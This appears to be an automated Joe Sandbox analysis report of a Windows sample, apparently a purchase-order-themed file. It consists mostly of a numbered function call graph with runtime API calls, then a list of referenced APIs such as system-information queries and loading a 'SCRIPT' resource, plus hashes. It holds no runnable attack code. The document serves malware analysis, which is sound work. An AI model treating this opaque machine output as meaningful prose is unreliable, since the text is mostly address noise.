95525 4be536 CallCatchBlock 95524->95525 95526 4be544 95525->95526 95529 4be574 95525->95529 95549 4bf2d9 20 API calls _abort 95526->95549 95528 4be549 95550 4c27ec 26 API calls pre_c_initialization 95528->95550 95531 4be579 95529->95531 95532 4be586 95529->95532 95551 4bf2d9 20 API calls _abort 95531->95551 95541 4c8061 95532->95541 95535 4be58f 95536 4be5a2 
95535->95536 95537 4be595 95535->95537 95553 4be5d4 LeaveCriticalSection __fread_nolock 95536->95553 95552 4bf2d9 20 API calls _abort 95537->95552 95539 4be554 __wsopen_s 95539->95493 95542 4c806d CallCatchBlock 95541->95542 95554 4c2f5e EnterCriticalSection 95542->95554 95544 4c807b 95555 4c80fb 95544->95555 95548 4c80ac __wsopen_s 95548->95535 95549->95528 95550->95539 95551->95539 95552->95539 95553->95539 95554->95544 95561 4c811e 95555->95561 95556 4c8177 95573 4c4c7d 95556->95573 95561->95556 95561->95561 95567 4c8088 95561->95567 95571 4b918d EnterCriticalSection 95561->95571 95572 4b91a1 LeaveCriticalSection 95561->95572 95562 4c8189 95562->95567 95586 4c3405 11 API calls 2 library calls 95562->95586 95564 4c81a8 95587 4b918d EnterCriticalSection 95564->95587 95568 4c80b7 95567->95568 95591 4c2fa6 LeaveCriticalSection 95568->95591 95570 4c80be 95570->95548 95571->95561 95572->95561 95578 4c4c8a _abort 95573->95578 95574 4c4cca 95589 4bf2d9 20 API calls _abort 95574->95589 95575 4c4cb5 RtlAllocateHeap 95576 4c4cc8 95575->95576 95575->95578 95580 4c29c8 95576->95580 95578->95574 95578->95575 95588 4b4ead 7 API calls 2 library calls 95578->95588 95581 4c29fc __dosmaperr 95580->95581 95582 4c29d3 RtlFreeHeap 95580->95582 95581->95562 95582->95581 95583 4c29e8 95582->95583 95590 4bf2d9 20 API calls _abort 95583->95590 95585 4c29ee GetLastError 95585->95581 95586->95564 95587->95567 95588->95578 95589->95576 95590->95585 95591->95570 95593 4afddb 22 API calls 95592->95593 95594 495734 95593->95594 95594->95503 95596 4942d9 95595->95596 95597 4942bc FindResourceExW 95595->95597 95596->95515 95597->95596 95598 4d35ba LoadResource 95597->95598 95598->95596 95599 4d35cf SizeofResource 95598->95599 95599->95596 95600 4d35e3 LockResource 95599->95600 95600->95596 95602 49512e 95601->95602 95603 4d3d90 95601->95603 95607 4bece3 95602->95607 95606->95508 95610 4beaaa 95607->95610 95609 49513c 95609->95515 95614 4beab6 CallCatchBlock 95610->95614 95611 4beac2 95623 4bf2d9 
20 API calls _abort 95611->95623 95613 4beae8 95625 4b918d EnterCriticalSection 95613->95625 95614->95611 95614->95613 95616 4beac7 95624 4c27ec 26 API calls pre_c_initialization 95616->95624 95617 4beaf4 95626 4bec0a 62 API calls 2 library calls 95617->95626 95620 4beb08 95627 4beb27 LeaveCriticalSection __fread_nolock 95620->95627 95621 4bead2 __wsopen_s 95621->95609 95623->95616 95624->95621 95625->95617 95626->95620 95627->95621 95631 4be8e1 95628->95631 95630 495118 95630->95521 95632 4be8ed CallCatchBlock 95631->95632 95633 4be92d 95632->95633 95634 4be900 ___scrt_fastfail 95632->95634 95635 4be925 __wsopen_s 95632->95635 95644 4b918d EnterCriticalSection 95633->95644 95658 4bf2d9 20 API calls _abort 95634->95658 95635->95630 95637 4be937 95645 4be6f8 95637->95645 95640 4be91a 95659 4c27ec 26 API calls pre_c_initialization 95640->95659 95644->95637 95649 4be70a ___scrt_fastfail 95645->95649 95651 4be727 95645->95651 95646 4be717 95733 4bf2d9 20 API calls _abort 95646->95733 95648 4be71c 95734 4c27ec 26 API calls pre_c_initialization 95648->95734 95649->95646 95649->95651 95653 4be76a __fread_nolock 95649->95653 95660 4be96c LeaveCriticalSection __fread_nolock 95651->95660 95652 4be886 ___scrt_fastfail 95736 4bf2d9 20 API calls _abort 95652->95736 95653->95651 95653->95652 95661 4bd955 95653->95661 95668 4c8d45 95653->95668 95735 4bcf78 26 API calls 4 library calls 95653->95735 95658->95640 95659->95635 95660->95635 95662 4bd961 95661->95662 95663 4bd976 95661->95663 95737 4bf2d9 20 API calls _abort 95662->95737 95663->95653 95665 4bd966 95738 4c27ec 26 API calls pre_c_initialization 95665->95738 95667 4bd971 95667->95653 95669 4c8d6f 95668->95669 95670 4c8d57 95668->95670 95672 4c90d9 95669->95672 95677 4c8db4 95669->95677 95748 4bf2c6 20 API calls _abort 95670->95748 95764 4bf2c6 20 API calls _abort 95672->95764 95673 4c8d5c 95749 4bf2d9 20 API calls _abort 95673->95749 95676 4c90de 95765 4bf2d9 20 API calls _abort 95676->95765 95679 4c8dbf 95677->95679 
95680 4c8d64 95677->95680 95685 4c8def 95677->95685 95750 4bf2c6 20 API calls _abort 95679->95750 95680->95653 95681 4c8dcc 95766 4c27ec 26 API calls pre_c_initialization 95681->95766 95683 4c8dc4 95751 4bf2d9 20 API calls _abort 95683->95751 95687 4c8e08 95685->95687 95688 4c8e2e 95685->95688 95689 4c8e4a 95685->95689 95687->95688 95693 4c8e15 95687->95693 95752 4bf2c6 20 API calls _abort 95688->95752 95755 4c3820 21 API calls 2 library calls 95689->95755 95692 4c8e33 95753 4bf2d9 20 API calls _abort 95692->95753 95739 4cf89b 95693->95739 95694 4c8e61 95697 4c29c8 _free 20 API calls 95694->95697 95702 4c8e6a 95697->95702 95698 4c8fb3 95700 4c9029 95698->95700 95703 4c8fcc GetConsoleMode 95698->95703 95699 4c8e3a 95754 4c27ec 26 API calls pre_c_initialization 95699->95754 95705 4c902d ReadFile 95700->95705 95704 4c29c8 _free 20 API calls 95702->95704 95703->95700 95706 4c8fdd 95703->95706 95707 4c8e71 95704->95707 95708 4c9047 95705->95708 95709 4c90a1 GetLastError 95705->95709 95706->95705 95711 4c8fe3 ReadConsoleW 95706->95711 95712 4c8e7b 95707->95712 95713 4c8e96 95707->95713 95708->95709 95710 4c901e 95708->95710 95714 4c90ae 95709->95714 95715 4c9005 95709->95715 95725 4c906c 95710->95725 95726 4c9083 95710->95726 95730 4c8e45 __fread_nolock 95710->95730 95711->95710 95718 4c8fff GetLastError 95711->95718 95756 4bf2d9 20 API calls _abort 95712->95756 95758 4c9424 28 API calls __wsopen_s 95713->95758 95762 4bf2d9 20 API calls _abort 95714->95762 95715->95730 95759 4bf2a3 20 API calls __dosmaperr 95715->95759 95718->95715 95719 4c29c8 _free 20 API calls 95719->95680 95721 4c90b3 95763 4bf2c6 20 API calls _abort 95721->95763 95723 4c8e80 95757 4bf2c6 20 API calls _abort 95723->95757 95760 4c8a61 31 API calls 3 library calls 95725->95760 95729 4c909a 95726->95729 95726->95730 95761 4c88a1 29 API calls __wsopen_s 95729->95761 95730->95719 95732 4c909f 95732->95730 95733->95648 95734->95651 95735->95653 95736->95648 95737->95665 95738->95667 95740 4cf8a8 
95739->95740 95742 4cf8b5 95739->95742 95767 4bf2d9 20 API calls _abort 95740->95767 95744 4cf8c1 95742->95744 95768 4bf2d9 20 API calls _abort 95742->95768 95743 4cf8ad 95743->95698 95744->95698 95746 4cf8e2 95769 4c27ec 26 API calls pre_c_initialization 95746->95769 95748->95673 95749->95680 95750->95683 95751->95681 95752->95692 95753->95699 95754->95730 95755->95694 95756->95723 95757->95730 95758->95693 95759->95730 95760->95730 95761->95732 95762->95721 95763->95730 95764->95676 95765->95681 95766->95680 95767->95743 95768->95746 95769->95743 95773 4be4e8 95770->95773 95772 50275d 95772->95523 95776 4be469 95773->95776 95775 4be505 95775->95772 95777 4be478 95776->95777 95778 4be48c 95776->95778 95784 4bf2d9 20 API calls _abort 95777->95784 95783 4be488 __alldvrm 95778->95783 95786 4c333f 11 API calls 2 library calls 95778->95786 95780 4be47d 95785 4c27ec 26 API calls pre_c_initialization 95780->95785 95783->95775 95784->95780 95785->95783 95786->95783 95792 502e7a 95787->95792 95788 502d3b 95788->95438 95788->95439 95789 4950f5 40 API calls 95789->95792 95790 5028fe 27 API calls 95790->95792 95791 49511f 64 API calls 95791->95792 95792->95788 95792->95789 95792->95790 95792->95791 95794 5022e7 95793->95794 95795 5022d9 95793->95795 95797 50232c 95794->95797 95798 4be5eb 29 API calls 95794->95798 95809 5022f0 95794->95809 95796 4be5eb 29 API calls 95795->95796 95796->95794 95822 502557 95797->95822 95800 502311 95798->95800 95800->95797 95802 50231a 95800->95802 95801 502370 95803 502374 95801->95803 95804 502395 95801->95804 95806 4be678 67 API calls 95802->95806 95802->95809 95805 502381 95803->95805 95808 4be678 67 API calls 95803->95808 95826 502171 95804->95826 95805->95809 95811 4be678 67 API calls 95805->95811 95806->95809 95808->95805 95809->95438 95810 50239d 95812 5023c3 95810->95812 95813 5023a3 95810->95813 95811->95809 95833 5023f3 95812->95833 95815 5023b0 95813->95815 95816 4be678 67 API calls 95813->95816 95815->95809 95817 4be678 67 API calls 
95815->95817 95816->95815 95817->95809 95818 5023ca 95819 5023de 95818->95819 95841 4be678 95818->95841 95819->95809 95821 4be678 67 API calls 95819->95821 95821->95809 95823 50257c 95822->95823 95825 502565 __fread_nolock 95822->95825 95824 4be8c4 __fread_nolock 40 API calls 95823->95824 95824->95825 95825->95801 95827 4bea0c ___std_exception_copy 21 API calls 95826->95827 95828 50217f 95827->95828 95829 4bea0c ___std_exception_copy 21 API calls 95828->95829 95830 502190 95829->95830 95831 4bea0c ___std_exception_copy 21 API calls 95830->95831 95832 50219c 95831->95832 95832->95810 95834 502408 95833->95834 95835 5024c0 95834->95835 95837 5021cc 40 API calls 95834->95837 95840 5024c7 95834->95840 95854 502606 95834->95854 95862 502269 40 API calls 95834->95862 95858 502724 95835->95858 95837->95834 95840->95818 95842 4be684 CallCatchBlock 95841->95842 95843 4be6aa 95842->95843 95844 4be695 95842->95844 95846 4be6a5 __wsopen_s 95843->95846 95898 4b918d EnterCriticalSection 95843->95898 95915 4bf2d9 20 API calls _abort 95844->95915 95846->95819 95848 4be69a 95916 4c27ec 26 API calls pre_c_initialization 95848->95916 95849 4be6c6 95899 4be602 95849->95899 95852 4be6d1 95917 4be6ee LeaveCriticalSection __fread_nolock 95852->95917 95855 502617 95854->95855 95856 50261d 95854->95856 95855->95856 95863 5026d7 95855->95863 95856->95834 95859 502731 95858->95859 95860 502742 95858->95860 95861 4bdbb3 65 API calls 95859->95861 95860->95840 95861->95860 95862->95834 95864 502703 95863->95864 95865 502714 95863->95865 95867 4bdbb3 95864->95867 95865->95855 95868 4bdbdd 95867->95868 95869 4bdbc1 95867->95869 95868->95865 95869->95868 95870 4bdbcd 95869->95870 95871 4bdbe3 95869->95871 95879 4bf2d9 20 API calls _abort 95870->95879 95876 4bd9cc 95871->95876 95874 4bdbd2 95880 4c27ec 26 API calls pre_c_initialization 95874->95880 95881 4bd97b 95876->95881 95878 4bd9f0 95878->95868 95879->95874 95880->95868 95882 4bd987 CallCatchBlock 95881->95882 95889 4b918d EnterCriticalSection 
95882->95889 95884 4bd995 95890 4bd9f4 95884->95890 95888 4bd9b3 __wsopen_s 95888->95878 95889->95884 95891 4c49a1 27 API calls 95890->95891 95892 4bda09 95891->95892 95893 4bda3a 62 API calls 95892->95893 95894 4bda24 95893->95894 95895 4c4a56 62 API calls 95894->95895 95896 4bd9a2 95895->95896 95897 4bd9c0 LeaveCriticalSection __fread_nolock 95896->95897 95897->95888 95898->95849 95900 4be60f 95899->95900 95901 4be624 95899->95901 95943 4bf2d9 20 API calls _abort 95900->95943 95907 4be61f 95901->95907 95918 4bdc0b 95901->95918 95904 4be614 95944 4c27ec 26 API calls pre_c_initialization 95904->95944 95907->95852 95910 4bd955 __fread_nolock 26 API calls 95911 4be646 95910->95911 95928 4c862f 95911->95928 95914 4c29c8 _free 20 API calls 95914->95907 95915->95848 95916->95846 95917->95846 95919 4bdc23 95918->95919 95921 4bdc1f 95918->95921 95920 4bd955 __fread_nolock 26 API calls 95919->95920 95919->95921 95922 4bdc43 95920->95922 95924 4c4d7a 95921->95924 95945 4c59be 95922->95945 95925 4c4d90 95924->95925 95927 4be640 95924->95927 95926 4c29c8 _free 20 API calls 95925->95926 95925->95927 95926->95927 95927->95910 95929 4c863e 95928->95929 95930 4c8653 95928->95930 96068 4bf2c6 20 API calls _abort 95929->96068 95932 4c868e 95930->95932 95937 4c867a 95930->95937 96070 4bf2c6 20 API calls _abort 95932->96070 95933 4c8643 96069 4bf2d9 20 API calls _abort 95933->96069 95935 4c8693 96071 4bf2d9 20 API calls _abort 95935->96071 96065 4c8607 95937->96065 95940 4c869b 96072 4c27ec 26 API calls pre_c_initialization 95940->96072 95941 4be64c 95941->95907 95941->95914 95943->95904 95944->95907 95946 4c59ca CallCatchBlock 95945->95946 95947 4c59ea 95946->95947 95948 4c59d2 95946->95948 95950 4c5a88 95947->95950 95955 4c5a1f 95947->95955 96024 4bf2c6 20 API calls _abort 95948->96024 96029 4bf2c6 20 API calls _abort 95950->96029 95951 4c59d7 96025 4bf2d9 20 API calls _abort 95951->96025 95954 4c5a8d 96030 4bf2d9 20 API calls _abort 95954->96030 95970 4c5147 EnterCriticalSection 
95955->95970 95956 4c59df __wsopen_s 95956->95921 95959 4c5a95 96031 4c27ec 26 API calls pre_c_initialization 95959->96031 95960 4c5a25 95962 4c5a56 95960->95962 95963 4c5a41 95960->95963 95971 4c5aa9 95962->95971 96026 4bf2d9 20 API calls _abort 95963->96026 95966 4c5a51 96028 4c5a80 LeaveCriticalSection __wsopen_s 95966->96028 95967 4c5a46 96027 4bf2c6 20 API calls _abort 95967->96027 95970->95960 95972 4c5ad7 95971->95972 96021 4c5ad0 95971->96021 95973 4c5afa 95972->95973 95974 4c5adb 95972->95974 95977 4c5b4b 95973->95977 95978 4c5b2e 95973->95978 96039 4bf2c6 20 API calls _abort 95974->96039 95982 4c5b61 95977->95982 96045 4c9424 28 API calls __wsopen_s 95977->96045 96042 4bf2c6 20 API calls _abort 95978->96042 95979 4c5cb1 95979->95966 95980 4c5ae0 96040 4bf2d9 20 API calls _abort 95980->96040 96032 4c564e 95982->96032 95985 4c5b33 96043 4bf2d9 20 API calls _abort 95985->96043 95987 4c5ae7 96041 4c27ec 26 API calls pre_c_initialization 95987->96041 95991 4c5b6f 95994 4c5b95 95991->95994 95995 4c5b73 95991->95995 95992 4c5ba8 95997 4c5bbc 95992->95997 95998 4c5c02 WriteFile 95992->95998 95993 4c5b3b 96044 4c27ec 26 API calls pre_c_initialization 95993->96044 96047 4c542e 45 API calls 3 library calls 95994->96047 96014 4c5c69 95995->96014 96046 4c55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 95995->96046 96001 4c5bc4 95997->96001 96002 4c5bf2 95997->96002 96000 4c5c25 GetLastError 95998->96000 96010 4c5b8b 95998->96010 96000->96010 96005 4c5bc9 96001->96005 96006 4c5be2 96001->96006 96050 4c56c4 7 API calls 2 library calls 96002->96050 96007 4c5bd2 96005->96007 96005->96014 96049 4c5891 8 API calls 2 library calls 96006->96049 96048 4c57a3 7 API calls 2 library calls 96007->96048 96010->96014 96015 4c5c45 96010->96015 96010->96021 96012 4c5be0 96012->96010 96013 4c5c8e 96055 4bf2c6 20 API calls _abort 96013->96055 96014->96021 96054 4bf2d9 20 API calls _abort 96014->96054 96017 4c5c4c 96015->96017 96018 4c5c60 96015->96018 96051 4bf2d9 20 API calls 
_abort 96017->96051 96053 4bf2a3 20 API calls __dosmaperr 96018->96053 96056 4b0a8c 96021->96056 96022 4c5c51 96052 4bf2c6 20 API calls _abort 96022->96052 96024->95951 96025->95956 96026->95967 96027->95966 96028->95956 96029->95954 96030->95959 96031->95956 96033 4cf89b __fread_nolock 26 API calls 96032->96033 96034 4c565e 96033->96034 96036 4c5663 96034->96036 96063 4c2d74 38 API calls 2 library calls 96034->96063 96036->95991 96036->95992 96037 4c5686 96037->96036 96038 4c56a4 GetConsoleMode 96037->96038 96038->96036 96039->95980 96040->95987 96041->96021 96042->95985 96043->95993 96044->96021 96045->95982 96046->96010 96047->96010 96048->96012 96049->96012 96050->96012 96051->96022 96052->96021 96053->96021 96054->96013 96055->96021 96057 4b0a97 IsProcessorFeaturePresent 96056->96057 96058 4b0a95 96056->96058 96060 4b0c5d 96057->96060 96058->95979 96064 4b0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96060->96064 96062 4b0d40 96062->95979 96063->96037 96064->96062 96073 4c8585 96065->96073 96067 4c862b 96067->95941 96068->95933 96069->95941 96070->95935 96071->95940 96072->95941 96074 4c8591 CallCatchBlock 96073->96074 96084 4c5147 EnterCriticalSection 96074->96084 96076 4c859f 96077 4c85c6 96076->96077 96078 4c85d1 96076->96078 96085 4c86ae 96077->96085 96100 4bf2d9 20 API calls _abort 96078->96100 96081 4c85cc 96101 4c85fb LeaveCriticalSection __wsopen_s 96081->96101 96083 4c85ee __wsopen_s 96083->96067 96084->96076 96102 4c53c4 96085->96102 96087 4c86c4 96115 4c5333 21 API calls 2 library calls 96087->96115 96088 4c86be 96088->96087 96089 4c86f6 96088->96089 96092 4c53c4 __wsopen_s 26 API calls 96088->96092 96089->96087 96093 4c53c4 __wsopen_s 26 API calls 96089->96093 96091 4c871c 96094 4c873e 96091->96094 96116 4bf2a3 20 API calls __dosmaperr 96091->96116 96095 4c86ed 96092->96095 96096 4c8702 FindCloseChangeNotification 96093->96096 96094->96081 96098 4c53c4 __wsopen_s 26 API calls 96095->96098 96096->96087 
96099 4c870e GetLastError 96096->96099 96098->96089 96099->96087 96100->96081 96101->96083 96103 4c53e6 96102->96103 96104 4c53d1 96102->96104 96107 4bf2c6 __dosmaperr 20 API calls 96103->96107 96109 4c540b 96103->96109 96105 4bf2c6 __dosmaperr 20 API calls 96104->96105 96106 4c53d6 96105->96106 96108 4bf2d9 __dosmaperr 20 API calls 96106->96108 96110 4c5416 96107->96110 96111 4c53de 96108->96111 96109->96088 96112 4bf2d9 __dosmaperr 20 API calls 96110->96112 96111->96088 96113 4c541e 96112->96113 96114 4c27ec pre_c_initialization 26 API calls 96113->96114 96114->96111 96115->96091 96116->96094 96117 491044 96122 4910f3 96117->96122 96119 49104a 96158 4b00a3 29 API calls __onexit 96119->96158 96121 491054 96159 491398 96122->96159 96126 49116a 96127 49a961 22 API calls 96126->96127 96128 491174 96127->96128 96129 49a961 22 API calls 96128->96129 96130 49117e 96129->96130 96131 49a961 22 API calls 96130->96131 96132 491188 96131->96132 96133 49a961 22 API calls 96132->96133 96134 4911c6 96133->96134 96135 49a961 22 API calls 96134->96135 96136 491292 96135->96136 96169 49171c 96136->96169 96140 4912c4 96141 49a961 22 API calls 96140->96141 96142 4912ce 96141->96142 96190 4a1940 96142->96190 96144 4912f9 96200 491aab 96144->96200 96146 491315 96147 491325 GetStdHandle 96146->96147 96148 49137a 96147->96148 96149 4d2485 96147->96149 96152 491387 OleInitialize 96148->96152 96149->96148 96150 4d248e 96149->96150 96151 4afddb 22 API calls 96150->96151 96153 4d2495 96151->96153 96152->96119 96207 50011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96153->96207 96155 4d249e 96208 500944 CreateThread 96155->96208 96157 4d24aa CloseHandle 96157->96148 96158->96121 96209 4913f1 96159->96209 96162 4913f1 22 API calls 96163 4913d0 96162->96163 96164 49a961 22 API calls 96163->96164 96165 4913dc 96164->96165 96166 496b57 22 API calls 96165->96166 96167 491129 96166->96167 96168 491bc3 6 API calls 96167->96168 
96168->96126 96170 49a961 22 API calls 96169->96170 96171 49172c 96170->96171 96172 49a961 22 API calls 96171->96172 96173 491734 96172->96173 96174 49a961 22 API calls 96173->96174 96175 49174f 96174->96175 96176 4afddb 22 API calls 96175->96176 96177 49129c 96176->96177 96178 491b4a 96177->96178 96179 491b58 96178->96179 96180 49a961 22 API calls 96179->96180 96181 491b63 96180->96181 96182 49a961 22 API calls 96181->96182 96183 491b6e 96182->96183 96184 49a961 22 API calls 96183->96184 96185 491b79 96184->96185 96186 49a961 22 API calls 96185->96186 96187 491b84 96186->96187 96188 4afddb 22 API calls 96187->96188 96189 491b96 RegisterWindowMessageW 96188->96189 96189->96140 96191 4a1981 96190->96191 96194 4a195d 96190->96194 96216 4b0242 5 API calls __Init_thread_wait 96191->96216 96193 4a196e 96193->96144 96194->96193 96218 4b0242 5 API calls __Init_thread_wait 96194->96218 96195 4a198b 96195->96194 96217 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96195->96217 96197 4a8727 96197->96193 96219 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96197->96219 96201 4d272d 96200->96201 96202 491abb 96200->96202 96220 503209 23 API calls 96201->96220 96204 4afddb 22 API calls 96202->96204 96205 491ac3 96204->96205 96205->96146 96206 4d2738 96207->96155 96208->96157 96221 50092a 28 API calls 96208->96221 96210 49a961 22 API calls 96209->96210 96211 4913fc 96210->96211 96212 49a961 22 API calls 96211->96212 96213 491404 96212->96213 96214 49a961 22 API calls 96213->96214 96215 4913c6 96214->96215 96215->96162 96216->96195 96217->96194 96218->96197 96219->96193 96220->96206 96222 4c8402 96227 4c81be 96222->96227 96225 4c842a 96228 4c81ef try_get_first_available_module 96227->96228 96238 4c8338 96228->96238 96242 4b8e0b 40 API calls 2 library calls 96228->96242 96230 4c83ee 96246 4c27ec 26 API calls pre_c_initialization 96230->96246 96232 4c8343 96232->96225 96239 4d0984 96232->96239 96234 4c838c 96234->96238 96243 4b8e0b 40 API 
calls 2 library calls 96234->96243 96236 4c83ab 96236->96238 96244 4b8e0b 40 API calls 2 library calls 96236->96244 96238->96232 96245 4bf2d9 20 API calls _abort 96238->96245 96247 4d0081 96239->96247 96241 4d099f 96241->96225 96242->96234 96243->96236 96244->96238 96245->96230 96246->96232 96248 4d008d CallCatchBlock 96247->96248 96249 4d009b 96248->96249 96252 4d00d4 96248->96252 96305 4bf2d9 20 API calls _abort 96249->96305 96251 4d00a0 96306 4c27ec 26 API calls pre_c_initialization 96251->96306 96258 4d065b 96252->96258 96257 4d00aa __wsopen_s 96257->96241 96308 4d042f 96258->96308 96261 4d068d 96340 4bf2c6 20 API calls _abort 96261->96340 96262 4d06a6 96326 4c5221 96262->96326 96265 4d06ab 96266 4d06cb 96265->96266 96267 4d06b4 96265->96267 96339 4d039a CreateFileW 96266->96339 96342 4bf2c6 20 API calls _abort 96267->96342 96271 4d00f8 96307 4d0121 LeaveCriticalSection __wsopen_s 96271->96307 96272 4d06b9 96343 4bf2d9 20 API calls _abort 96272->96343 96273 4d0704 96274 4d0781 GetFileType 96273->96274 96276 4d0756 GetLastError 96273->96276 96344 4d039a CreateFileW 96273->96344 96277 4d078c GetLastError 96274->96277 96278 4d07d3 96274->96278 96345 4bf2a3 20 API calls __dosmaperr 96276->96345 96346 4bf2a3 20 API calls __dosmaperr 96277->96346 96348 4c516a 21 API calls 2 library calls 96278->96348 96279 4d0692 96341 4bf2d9 20 API calls _abort 96279->96341 96283 4d079a CloseHandle 96283->96279 96286 4d07c3 96283->96286 96285 4d0749 96285->96274 96285->96276 96347 4bf2d9 20 API calls _abort 96286->96347 96288 4d07f4 96290 4d0840 96288->96290 96349 4d05ab 72 API calls 3 library calls 96288->96349 96289 4d07c8 96289->96279 96294 4d086d 96290->96294 96350 4d014d 72 API calls 4 library calls 96290->96350 96293 4d0866 96293->96294 96295 4d087e 96293->96295 96296 4c86ae __wsopen_s 29 API calls 96294->96296 96295->96271 96297 4d08fc CloseHandle 96295->96297 96296->96271 96351 4d039a CreateFileW 96297->96351 96299 4d0927 96300 4d0931 GetLastError 96299->96300 96301 4d095d 
96299->96301 96352 4bf2a3 20 API calls __dosmaperr 96300->96352 96301->96271 96303 4d093d 96353 4c5333 21 API calls 2 library calls 96303->96353 96305->96251 96306->96257 96307->96257 96309 4d046a 96308->96309 96310 4d0450 96308->96310 96354 4d03bf 96309->96354 96310->96309 96361 4bf2d9 20 API calls _abort 96310->96361 96313 4d045f 96362 4c27ec 26 API calls pre_c_initialization 96313->96362 96315 4d04a2 96316 4d04d1 96315->96316 96363 4bf2d9 20 API calls _abort 96315->96363 96324 4d0524 96316->96324 96365 4bd70d 26 API calls 2 library calls 96316->96365 96319 4d051f 96321 4d059e 96319->96321 96319->96324 96320 4d04c6 96364 4c27ec 26 API calls pre_c_initialization 96320->96364 96366 4c27fc 11 API calls _abort 96321->96366 96324->96261 96324->96262 96325 4d05aa 96327 4c522d CallCatchBlock 96326->96327 96369 4c2f5e EnterCriticalSection 96327->96369 96329 4c5234 96331 4c5259 96329->96331 96335 4c52c7 EnterCriticalSection 96329->96335 96337 4c527b 96329->96337 96373 4c5000 96331->96373 96332 4c52a4 __wsopen_s 96332->96265 96336 4c52d4 LeaveCriticalSection 96335->96336 96335->96337 96336->96329 96370 4c532a 96337->96370 96339->96273 96340->96279 96341->96271 96342->96272 96343->96279 96344->96285 96345->96279 96346->96283 96347->96289 96348->96288 96349->96290 96350->96293 96351->96299 96352->96303 96353->96301 96356 4d03d7 96354->96356 96355 4d03f2 96355->96315 96356->96355 96367 4bf2d9 20 API calls _abort 96356->96367 96358 4d0416 96368 4c27ec 26 API calls pre_c_initialization 96358->96368 96360 4d0421 96360->96315 96361->96313 96362->96309 96363->96320 96364->96316 96365->96319 96366->96325 96367->96358 96368->96360 96369->96329 96381 4c2fa6 LeaveCriticalSection 96370->96381 96372 4c5331 96372->96332 96374 4c4c7d _abort 20 API calls 96373->96374 96375 4c5012 96374->96375 96379 4c501f 96375->96379 96382 4c3405 11 API calls 2 library calls 96375->96382 96376 4c29c8 _free 20 API calls 96378 4c5071 96376->96378 96378->96337 96380 4c5147 EnterCriticalSection 96378->96380 
API calls ___scrt_fastfail 97583->97617 97585 4d2e4d 97584->97585 97586 4931b9 97584->97586 97585->97568 97616 4f0ad7 22 API calls 97585->97616 97593 4931c4 97586->97593 97594 493253 97586->97594 97587 4d2e8e 97587->97568 97587->97606 97588->97606 97595 4d2da7 97589->97595 97596 4d2dc6 SetFocus 97589->97596 97593->97568 97615 4930f2 Shell_NotifyIconW ___scrt_fastfail 97593->97615 97611 49326f 44 API calls ___scrt_fastfail 97594->97611 97595->97593 97600 4d2db0 97595->97600 97596->97606 97597 493214 97610 493c50 DeleteObject DestroyWindow 97597->97610 97598 493263 97598->97606 97612 4918e2 10 API calls 97600->97612 97604->97568 97607 4d2e41 97608 493837 49 API calls 97607->97608 97608->97604 97609->97597 97610->97606 97611->97598 97612->97606 97613->97581 97614->97593 97615->97607 97616->97604 97617->97598 97618->97587

                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0049430D
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • GetCurrentProcess.KERNEL32(?,0052CB64,00000000,?,?), ref: 00494422
                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00494429
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00494454
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00494466
                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00494474
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0049447B
                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 004944A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                      • API String ID: 3290436268-3101561225
                                      • Opcode ID: 7ca8611100ac370cd75456db4ade91de4ff80124fe3ab8cdffa3735d6943cad9
                                      • Instruction ID: 97c38c3ff7e41e587d87968f86bd33cc299025d8841e40491185eb582f355be7
                                      • Opcode Fuzzy Hash: 7ca8611100ac370cd75456db4ade91de4ff80124fe3ab8cdffa3735d6943cad9
                                      • Instruction Fuzzy Hash: A4A1A761B0AAD0CFCB11CB6DBD415B57FA46B76340B1C4CABD04397722D6A8450EEB2E

                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004950AA,?,?,00000000,00000000), ref: 004942B2
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004950AA,?,?,00000000,00000000), ref: 004942C9
                                      • LoadResource.KERNEL32(?,00000000,?,?,004950AA,?,?,00000000,00000000,?,?,?,?,?,?,00494F20), ref: 004D35BE
                                      • SizeofResource.KERNEL32(?,00000000,?,?,004950AA,?,?,00000000,00000000,?,?,?,?,?,?,00494F20), ref: 004D35D3
                                      • LockResource.KERNEL32(004950AA,?,?,004950AA,?,?,00000000,00000000,?,?,?,?,?,?,00494F20,?), ref: 004D35E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
